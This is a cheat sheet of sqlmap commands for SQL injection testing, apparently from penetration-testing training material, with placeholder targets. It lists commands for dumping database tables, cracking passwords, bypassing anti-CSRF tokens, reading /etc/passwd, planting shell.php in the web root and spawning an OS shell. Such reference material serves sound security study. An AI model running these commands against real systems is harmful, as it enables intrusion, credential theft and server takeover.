SQLMAP ESSENTIALS
CHEAT SHEET
| Command | Description |
|---|---|
| `sqlmap -h` | View the basic help menu |
| `sqlmap -hh` | View the advanced help menu |
| `sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` | Run SQLMap without asking for user input |
| `sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` | SQLMap with POST request |
| `sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'` | POST request specifying an injection point with an asterisk |
| `sqlmap -r req.txt` | Passing an HTTP request file to SQLMap |
| `sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'` | Specifying a cookie header |
| `sqlmap -u www.target.com --data='id=1' --method PUT` | Specifying a PUT request |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` | Store traffic to an output file |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` | Specify verbosity level |
| `sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` | Specifying a prefix or suffix |
| `sqlmap -u www.example.com/?id=1 -v 3 --level=5` | Specifying the level and risk |
| `sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba` | Basic DB enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` | Table enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname` | Table/row enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"` | Conditional enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --schema` | Database schema enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --search -T user` | Searching for data |
| `sqlmap -u "http://www.example.com/?id=1" --passwords --batch` | Password enumeration and cracking |
| `sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` | Anti-CSRF token bypass |
| `sqlmap --list-tampers` | List all tamper scripts |
| `sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` | Check for DBA privileges |
| `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a local file |
| `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` | Writing a file |
| `sqlmap -u "http://www.example.com/?id=1" --os-shell` | Spawning an OS shell |